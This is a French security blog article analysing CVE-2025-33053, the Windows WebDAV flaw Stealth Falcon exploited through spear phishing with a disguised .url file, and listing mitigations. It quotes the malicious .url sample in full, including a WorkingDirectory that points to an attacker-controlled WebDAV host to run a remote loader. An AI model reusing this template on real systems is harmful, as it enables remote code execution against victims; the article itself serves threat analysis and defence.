[ Patch ] Vulnérabilité critique: WebDAV mis à mal via la CVE 2025-33053, l’ingénierie du mode opératoire et les mesures correctives

Un score de vulnérabilité très élevé pourrait laisser croire à une aisance de mise en œuvre en attaque « frontale ». Loin de là, et la vulnérabilité enregistrée sous le code CVE 2025-33053, avec un score CVSS de 8.8 sur 10, le montre bien. Toute la magie et l’ingénierie derrière elle nécessite des connaissances systèmes et réseaux approfondies, non sans négliger un flair de qualité en ingénierie sociale, bien montée et mise en œuvre dans une campagne de spear phishing. Elle est baptisée « Vulnérabilité du contrôle externe du nom de fichier ou du chemin d’accès de Microsoft Windows » (en : « Microsoft Windows External Control of File Name or Path Vulnerability »), et permet d’exploiter une faiblesse du client WebDAV, en l’occurrence ledit système, pour déployer des logiciels malveillants. Avec une une portée combinée et variable entre l’intégrité et la confidentialité ; l’intégrité, la confidentialité et la disponibilité ; ou tout simplement la disponibilité des fichiers ciblés, chercher à comprendre les mécanismes et mesures palliatives autour est loin d’être une option.
Genèse et exploitation potentielle de la vulnérabilité
Certains outils utilisés dans le cadre d’une sécurité offensive, ou de tests d’intrusion visant l’anticipation de menaces réelles, peuvent se voir détournés dans leurs usages pour mener des attaques d’envergure. C’est en ce sens que le potentiel de l’outil de post-exploitation opensource Mythic, une plateforme de commande et de contrôle collaborative, sensée aider les équipes de red teaming a effectuer des tests d’intrusion avancés, a été exploitée par une célèbre organisation dans le monde du hacking appelée Stealth Falcon.
Dans son fonctionnement, le framework Mythic se concentre sur la phase de post-exploitation, c’est-à-dire, sur les actions entreprises après avoir obtenu un accès initial à un système. Il utilise à cet effet un agent sur la machine de la victime, pour, à la fois maintenir des accès à l’attaquant tout en camouflant sa présence, et lui donner la possibilité d’exécuter diverses commandes.
Horus, l’agent utilisé par l’organisation Stealth Falcon est une version personnalisée, utilisée avec Mythic côté serveur, pour tirer parti du protocole WebDAV, en déroutant les utilisateurs via fichier .url déguisé, en PDF par exemple. A titre de rappel, le protocole WebDAV qui est davantage étayé dans cet article, permet un traitement collaboratif de fichiers partagés sur un réseau local ou internet. Parmi les clients d’un serveur WebDAV, nous avons les systèmes d’exploitation Windows, qui savent donc lire et interpréter les adresses réseaux (URL) conformes à ce protocole, et permettent aux utilisateurs d’accéder aux fichiers partagés.
Un fichier .url est un fichier raccourci qui pointe vers une ressource réseau en général et internet en particulier. Il peut s’agir d’un raccourci vers une page web, un fichier quelconque en ligne, ou un fichier rendu accessible au moyen du protocole WebDAV. Pou obtenir un tel fichier, il est par exemple possible de faire glisser une adresse URL depuis un navigateur web sur le bureau d’un ordinateur. Le fichier .url sera ensuite créé même s’il n’a pas l’extension « .url ». Dans la même lancée, s’il a une autre extension mais avec un contenu non conforme à celui d’un fichier .url, il se peut qu’il soit tout de même exécuté quand vous cliquez dessus.
Des techniques de phishing auraient ainsi été utilisées pour tromper la vigilence de leurs cibles favorites, dont certains gouvernements d’Afrique ou du Moyen-Orient, des organismes ou entreprises de sécurité. Le principe du phishing par email reposant sur les pièces jointes, ledit fichier factice sera joint à un email aux allures normales et au contenu attrayant pour la cible, le plus souvent soigneusement étudiée (spear phishing). C’est en exploitant ce principe que dès le téléchargement du fichier, une chaîne d’infection se déploie comme l’illustre la figure ci-dessous :

L’image illustrative ci-dessus extraite de certains rapports techniques, a permi d’établir un scénario d’attaque probable, utilisé par Stealth Falcon pour exploiter la vulnérabilité CVE 2025-33053, ainsi qu’il suit :
Un fichier nommé tlm.005_teleskopik_mast_hasar_bildirim_raporu.pdf.url (traduction du turc: TLM.005 Telescopic Mast Damage Report.pdf.url) peut être envoyé comme une pièce jointe dans un e-mail de phishing. Malgré la nomenclature du fichier faisant allusion à un PDF, le contenu du fichier est en réalité un fichier .url aux données biaisées comme nous pouvons le voir ci-dessous :
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
Le nœud du piège dans ce fichier se trouve au niveau du paramètre WorkingDirectory qui est en déphasage avec le paramètre URL qui le précède, et qui peut donner l’impression au système que la ressource à charger est iediagcmd.exe, un utilitaire de diagnostic légitime pour Internet Explorer. Malheureusement pour la machine victime, le répertoire qui sera chargé lors de l’exécution ne sera pas celui de ce petit utilitaire mais le contenu d’un répertoire WebDAV contrôlé par l’attaquant (WorkingDirectory = \\ SummerArcamp [.] Net @ ssl @ 443 / davwwwroot \ osyxaojr). Ce faisant, Route.exe, l’exécutable des attaquants placé dans ledit répertoire sera lancé, ouvrant de fait la voie au fichier malveillant Horus Loader (Route.exe), la version personnalisée de l’agent Mythic sus-évoqué, qui, pour ne pas éveiller les soupçons de l’utilateur, chargera tout de même un fichier PDF en même temps que le véritable processus malveillant se déroule en arrière plan.
Horus Loader, noeud de la chaîne d’infection exécuté à partir du serveur WebDAV des attaquants agit comme un chargeur à plusieurs étapes. Il est écrit en C ++ et utilise le virtualiseur de code, un système de protection de code qui transforme le code en instructions de machine virtuelle personnalisée, ce qui rend difficile toute opération de rétro-ingénierie. De plus, ce loader est signé, mais avec une signature obsolète sans horodatage TSA, susceptible d’empêcher les détections automatiques de certains produits de sécurité sur des échantillons non signés.
Mesures d’atténuation et de correction envisageables
D’entrée de jeu, on serait tenté de parler de mise à jour. Mais que se passerait-il s’il y en avait pas ? La mesure la plus salutaire qui prévaut pour toutes les vulnérabilités, c’est la prévention. Celle-ci passe par la formation et la sensibilisation. Comme nous avons pu le relever, des méthodes classiques vraissemblablement obsolètes peuvent servir de perche à des attaques plus importantes, puisque dans le cas d’espèce, tout commence avec du spear phishing, qui conduit à l’exploitation d’une vulnérabilité du client WebDAV (système d’exploitation Windows), qui permettra de charger un module malveillant léger (Horus Loader), permettant à son tour d’utiliser une charge encore plus importante. Dans une telle dynamique de payload chaining, il faut s’attendre à tout, dans la mesure où certaines sources ont même fait allusion aux ransomwares qui pourraient être déployés via ce mécanisme.
La seconde mesure qui est la plus évidente, consiste à faire une mise à jour du système concerné, à condition qu’un « patch », permettant de corriger le problème ait été publié. Heureusement pour les utilisateurs de Windows, Microsoft a publié un correctif à la vulnérabilité CVE-2025-33053 le 10 juin 2025 dernier, dans le cadre de son Patch Tuesday. Sont concernés, les systèmes d’exploitation depuis Windows Server 2012 pour les versions serveurs et Windows 8 pour les versions desktop. Publié ainsi, il s’avère évident que les plus anciennes versions de ce système d’exploitation restent tout simplement vulnérables. Les retardataires ou réfractaires qui s’en serviraient encore devraient donc tout d’abord procéder à mise à jour du système en lui-même, avant de chercher à y déployer les derniers correctifs.
La dernière mesure et non des moindres, peut être l’usage d’un système de protection des terminaux. Nous faisons ici allusion à un antivirus à intégrer à votre système de messagerie, question de scanner les pièces jointes d’une part, et d’autre part, de vérifier la source émettrice afin de s’assurer qu’elle n’est pas répertoriée comme malveillante.
Somme toute, une vulnérabilité peut en cacher une autre. Et même si on ne le dit pas souvent de manière formelle, l’humain représente une vulnérabilité permanente susceptible de permettre l’exploitation d’autres vulnérabilités plus enfouies au sein d’un système. Une défense en profondeur, des mises à jour régulière, une veille permanente alliée à une sensibilisation aigue se révèlent par conséquent être une batterie de contre-mesures idoine. Dans le cas de la CVE 2025-33053 qui nous intéressait, l’ingéniosité avec laquelle elle est révélée et exploitée force l’admiration et impose une remise en question quant à la priorisation découlant du scoring CVSS. Ce dernier ne devrait en aucun cas donner lieu à de la négligence ou à une sur-importance de certaines vulnérabilités. Des experts l’ont d’ailleurs si bien remarqué en affirmant que certaines des attaques les plus répandues et les plus dévastatrices ont inclus de multiples vulnérabilités évaluées «High», «Medium» ou même «Low». Cette méthodologie, connue sous le nom de «chaînage», utilise des vulnérabilités de scores inférieurs pour prendre pied, puis exploiter des vulnérabilités supplémentaires pour augmenter le privilège sur une base progressive. Parmi les 4% des CVE exploités connus, 42% sont utilisés le jour 0 de divulgation; 50% dans les 2 jours; et 75% dans les 28 jours. Vigilance et réactivité restent donc de mise face à toutes les menaces.
Références:
- https://www.kaspersky.com/blog/cve-2025-33053-june-2025-patch-tuesday/53630/?utm_source=facebook&utm_medium=organicsocial&utm_campaign=gl_kasperskydaily_acq_ona_smm__onl_b2c_fbo_ban600x100_sm-team_______89667e029c28cb02&kaspr=tk3h
- https://nvd.nist.gov/vuln/detail/CVE-2025-33053
- https://research.checkpoint.com/2025/stealth-falcon-zero-day/
- https://www.online-convert.com/fr/format-fichier/url
- https://www.cisa.gov/news-events/directives/bod-22-01-reducing-significant-risk-known-exploited-vulnerabilities
- https://cwe.mitre.org/data/definitions/73.html
- https://www.kaspersky.com/blog/cve-2025-33053-june-2025-patch-tuesday/53630/#:~:text=CVE%2D2025%2D33053%20has%20a,versions%20of%20its%20operating%20system.
- https://www.tenable.com/cve/CVE-2025-33053